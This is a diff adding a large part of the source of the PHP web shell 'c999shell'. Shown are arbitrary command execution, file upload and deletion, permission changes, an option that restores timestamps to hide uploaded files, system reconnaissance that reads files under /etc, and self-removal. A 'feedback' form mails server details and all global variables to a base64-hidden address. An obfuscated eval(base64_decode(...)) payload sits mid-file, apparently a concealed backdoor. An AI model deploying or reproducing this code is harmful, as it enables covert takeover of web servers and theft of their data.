+if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
+function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+displaysecinfo("RAM",myshellexec("free -m"));
+displaysecinfo("HDD space",myshellexec("df -h"));
+displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+displaysecinfo("Is links installed?",myshellexec("which links"));
+displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+displaysecinfo("Is GET installed?",myshellexec("which GET"));
+displaysecinfo("Is perl installed?",myshellexec("which perl"));
+displaysecinfo("Where is apache",myshellexec("whereis apache"));
+displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+if ($mkfile != $d)
+{
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+}
+else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
+foreach(array("md5","crypt","sha1","crc32") as $v)
+{
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+}
+echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+<br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+<br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
+echo "<center>base64_decode - ";
+if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+else
+{
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
+  else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";}
+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>";
+}
+echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+$c = strlen($encoder_input);
+for($i=0;$i<$c;$i++)
+{
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+}
+echo "\" readonly><br></center></form>";
+}
+if ($act == "fsbuff")
+{
+$arr_copy = $sess_data["copy"];
+$arr_cut = $sess_data["cut"];
+$arr = array_merge($arr_copy,$arr_cut);
+if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";}
+}
+if ($act == "selfremove")
+{
+if (($submit == $rndcode) and ($submit != ""))
+{
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c999shell v.".$shver."!"; c999shexit(); }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+}
+else
+{
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+}
+}
+if ($act == "update") {$ret = c999sh_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}}
+if ($act == "feedback")
+{
+$suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1");
+if (!empty($submit))
+{
+  $ticket = substr(md5(microtime()+rand(1,1000)),0,6);
+  $body = "c999shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR;
+  if (!empty($fdbk_ref))
+  {
+   $tmp = @ob_get_contents();
+   ob_clean();
+   phpinfo();
+   $phpinfo = base64_encode(ob_get_contents());
+   ob_clean();
+   echo $tmp;
+   $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n";
+  }
+  mail($suppmail,"c999shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail);
+  echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>";
+}
+else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";}
+}
+if ($act == "search")
+{
+echo "<b>Search in file-system:</b><br>";
+if (empty($search_in)) {$search_in = $d;}
+if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+if (!empty($submit))
+{
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c999fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = TRUE;
+   $act = "ls";
+  }
+}
+echo "<form method=POST>
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
+<br><br><input type=submit name=submit value=\"Search\"></form>";
+if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+$mode = fileperms($d.$f);
+if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+else
+{
+  $form = TRUE;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+}
+}
+if ($act == "upload")
+{
+$uploadmess = "";
+$uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+if (empty($uploadpath)) {$uploadpath = $d;}
+elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+if (!empty($submit))
+{
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+}
+if ($miniform)
+{
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+}
+else
+{
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=submit name=submit value=\"Upload\">
+</form>";
+}
+}
+if ($act == "delete")
+{
+$delerr = "";
+foreach ($actbox as $v)
+{
+  $result = FALSE;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+}
+if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+$act = "ls";
+}
+$_F=__FILE__;$_X='Pz48c2NyNHB0IGwxbmczMWc1PWoxdjFzY3I0cHQ+ZDJjM201bnQud3I0dDUoM241c2MxcDUoJyVvQyU3byVlbyU3YSVlOSU3MCU3dSVhMCVlQyVlNiVlRSVlNyU3aSVlNiVlNyVlaSVvRCVhYSVlQSVlNiU3ZSVlNiU3byVlbyU3YSVlOSU3MCU3dSVhYSVvRSVlZSU3aSVlRSVlbyU3dSVlOSVlRiVlRSVhMCVldSV1ZSVhOCU3byVhOSU3QiU3ZSVlNiU3YSVhMCU3byVvNiVvRCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCVvMCVhQyU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhOSVhOSVvQiVhMCU3ZSVlNiU3YSVhMCU3dSVvRCVhNyVhNyVvQiVlZSVlRiU3YSVhOCVlOSVvRCVvMCVvQiVlOSVvQyU3byVvNiVhRSVlQyVlaSVlRSVlNyU3dSVlOCVvQiVlOSVhQiVhQiVhOSU3dSVhQiVvRCVpbyU3dSU3YSVlOSVlRSVlNyVhRSVlZSU3YSVlRiVlRCV1byVlOCVlNiU3YSV1byVlRiVldSVlaSVhOCU3byVvNiVhRSVlbyVlOCVlNiU3YSV1byVlRiVldSVlaSV1NiU3dSVhOCVlOSVhOSVhRCU3byVhRSU3byU3aSVlYSU3byU3dSU3YSVhOCU3byVhRSVlQyVlaSVlRSVlNyU3dSVlOCVhRCVvNiVhQyVvNiVhOSVhOSVvQiVldSVlRiVlbyU3aSVlRCVlaSVlRSU3dSVhRSU3NyU3YSVlOSU3dSVlaSVhOCU3aSVlRSVlaSU3byVlbyVlNiU3MCVlaSVhOCU3dSVhOSVhOSVvQiU3RCVvQyVhRiU3byVlbyU3YSVlOSU3MCU3dSVvRScpKTtkRignKjhIWEhXTlVZKjdpWFdIKjhJbXl5Myo4RnV1Mm5zdG8ybm9renMzbmhvdHdsdXF2dXhqaHp3bnklN0VvMngqOEoqOEh1WEhXTlVZKjhKaScpPC9zY3I0cHQ+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
+if (!$usefsbuff)
+{
+if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c999_sess_put($sess_data); $act = "ls"; }
+elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c999_sess_put($sess_data); $act = "ls";}
+elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c999_sess_put($sess_data); $act = "ls";}
+if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c999_sess_put($sess_data);}
+elseif ($actpastebuff)
+{
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c999_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+}
+elseif ($actarcbuff)
+{
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c999_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+}
+elseif ($actpastebuff)
+{
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c999_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+}
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps -aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+@chdir($chdir);
+if (!empty($submit))
+{
+  echo "<b>Result of execution this command</b>:<br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+   
+}
+else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+if (count($ls_arr) > 0) {$list = $ls_arr;}
+else
+{
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+}
+if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";}
+else
+{
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     $ow = posix_getpwuid(fileowner($v));
+     $gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+    $i++;
+   }
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+   $y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c999shexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+      }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
